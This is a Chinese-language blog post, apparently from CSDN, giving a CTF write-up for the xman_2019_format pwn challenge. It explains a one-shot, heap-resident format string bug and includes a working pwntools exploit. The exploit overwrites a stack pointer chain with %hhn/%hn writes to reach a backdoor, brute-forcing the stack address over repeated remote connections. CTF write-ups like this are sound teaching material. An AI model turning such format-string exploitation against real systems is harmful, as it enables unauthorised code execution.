xman_2019_format(非栈上格式化字符串仅一次利用的爆破)

最新推荐文章于 2024-03-30 01:07:01 发布
最新推荐文章于 2024-03-30 01:07:01 发布
阅读量652 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121237020
版权

xman_2019_format:

看名字是格式化字符串
checksec一下
请添加图片描述
在这里插入图片描述
在printf处
请添加图片描述

程序分析:

有个后门
请添加图片描述
请添加图片描述

利用思路:

由于我们写入的数据存在堆里,我们无法改到我们写入的地址的值
但我们能利用栈上原有的地址,改值
这里具体就是改写ebp上的链指向栈上,我们改为为后门的地址

具体步骤:

先调试下,停在第一个printf处,看stack
如图所示,我们可以
1.我们把28(偏移10)处的0xffffd038的值(0xffffd068)改为0xffffd01c或0xffffd03c,只需改一个字节
2.在偏移48(偏移18)处的,改动现在已改为(0xffffd01c或0xffffd03c)的值为(0x804864b或0x8048697)后门函数的地址,只需改两个字节

由于这道题没法循环交互,我们没法靠泄露栈地址,知道栈的确切地址
只能靠爆破
多爆破几次,总有一次试对,就可能拿到shell了
在这里插入图片描述

exp:

from pwn import *
#from LibcSearcher import * 
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
def debug(cmd=''):
     gdb.attach(r,cmd)
#-------------------------------
def pwn():
    backdoor=0x80485AB
    payload='%'+str(0x3c)+'c%10$hhn|'
    #payload='%'+str(0x1c)+'c%10$hhn|'
    payload+='%'+str(backdoor&0xffff)+'c%18$hn|'
    se(payload)
    r.interactive()
if __name__ == "__main__":
    i=0
    while i<=70:
        i+=1
        r = remote('node4.buuoj.cn',25141)
        #r=process('./xman_2019_format')
        try:
            pwn()
        except:
            r.close()

其他:

参考师傅:
https://www.cnblogs.com/LynneHuan/p/14535038.html#xman_2019_format
https://blog.csdn.net/seaaseesa/article/details/105861452
争取我能每天写一篇,坚持下去orz

Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Unicode-XMan.rar_beta
09-24
**Unicode-XMan.rar_beta** 是一个压缩包,包含 **Unicode XMan Version 1.0 Beta (20090910)** 的资源,主要用于查看和理解Unicode字符。这个工具是一个早期的测试版本,发布于2009年9月10日,旨在帮助用户探索...
非栈上的格式化字符串漏洞
Grxer的博客
03-20 786
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got表也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
xman_2019_format(非栈格式化字符串一次利用爆破)
seaaseesa的博客
04-30 1491
xman_2019_format 首先检查一下程序的保护机制 然后用IDA分析一下 存在一个后门函数 s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地...
非栈格式化字符串漏洞
2302_79813730的博客
02-21 934
如图,红色框为a-b-c,我们可以利用格式化字符串漏洞更改c为蓝色框的第一个地址,这样我们就得到a-b-c-d,有这个我们一定可以找到b-c-d,这样我们就可以把d改成one_gadget的地址,d正好是main函数的返回地址,我们一般修改的也是这个。但这样实际是行不通的,通过调试我们可以看到三次更改的都是尾字节,为什么呢,原因就在于非栈上,每一次更改都要有对应的返回地址,这是第一次的,第二次要修改的是中间两字节,在原本基础上+2就可以了,第三次原理相似(想学堆上的可以自己去搜索,我目前也没学到。
非栈上的格式化字符串漏洞利用
qq_52877079的博客
03-25 370
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用
非栈格式化字符串
最新发布
Chuang__的博客
03-30 701
非栈格式化字符串,BeginCTF,Bad_cat_CTF 的两道例题
第四届Xman个人排位赛流量分析之strange_ssid复现
12-29
第四届Xman个人排位赛流量分析之strange_ssid复现 查找SSID找到一个md5,爆破之,得flag{n3k0}
taobao_cookieman:定时登陆淘宝获取有效cookie
07-05
taobao_cookieman ...文件: login_robot.py 提供Restful服务 template/login-cfg.ctp 配置模板基本不用更改 template/platform_login.ctp 爬虫脚本模板,通过配置后生成 ${店铺名}_login.js 爬虫文件 ...
Xman非常好用
07-30
Xman:一款高效实用的软件工具》 Xman,这款被誉为“非常好用”的软件工具,无疑在IT领域中占据了一席之地。它以其强大的功能和便捷的操作性赢得了用户的广泛赞誉。然而,作为一位负责任的IT专业人士,我们需要...
x_code:二维码生成工具
05-01
x_code二维码生成工具 (兼容PC和移动端 table & canvas)Nmae : qrcode.min.jsDes:把字符串转化为二维码,支持中文,英文和符号转化. 使用方法: xMan_qrcode(options) 返回 table 或者 canvas options{ text 转二维码的...
非栈上的格式化字符串利用例题讲解
fzucaicai的博客
03-06 747
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
BUU-SWPUCTF_2019_login
m0_46204503的博客
12-22 2202
非栈格式化字符串漏洞 具体原理:由于不在栈上,所以我们可控数据没法写到栈上,也就没有办法变成printf的某个参数 例(buu-SWPUCTF_2019_login) 检查保护,没pie,got可被修改 IDA查看程序,存在格式化字符串漏洞 思路:由于不存在栈溢出,且没有给libc,那么我们的思路就有限了,修改printf的got 问题分析: 首先这是一道32位的非栈格式化字符串漏洞,那么与普通格式化字符串漏洞相比较有什么区别呢? 首先栈信息泄露是相同的,但是找偏移的话较为不
xman_2019_format
Tw0的博客
02-20 76
记录一下32位程序非栈格式化字符串爆破技巧。
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 609
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
[BUUCTF-pwn]——xman_2019_format
Y_peak的博客
03-30 525
[BUUCTF-pwn]——xman_2019_format 本小白终于想明白了, 第一个写出来这道题的人, 好厉害感觉. 脑袋嗡嗡的, 这道题让我想了一个上午竟然, 果然适当睡眠有助于思考, 睡一觉就想出来了. 也看过几个题解不过,虽然解法相同,但是基本都木有将清楚, 每一步的原因是什么都木有说清楚. peak不才, 在这里试着详细说明一下, 毕竟想了一个上午的东西,还是有必要好好总结一下的 . peak小知识 ALSR : 你们肯定都知道,不就是地址随机化嘛有什么, 但是这道题如果你们不清楚具体的原理
BUU_SWPUCTF_2019_login非栈格式化字符串
qq_70452545的博客
04-21 224
对于栈上的格式化字符串可以通过直接将对应地址写入栈中,然后利用三链对任意写入地址修改,非栈上也就是不能直接写入,利用格式化字符串一样可以修改,只是要麻烦一点。
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值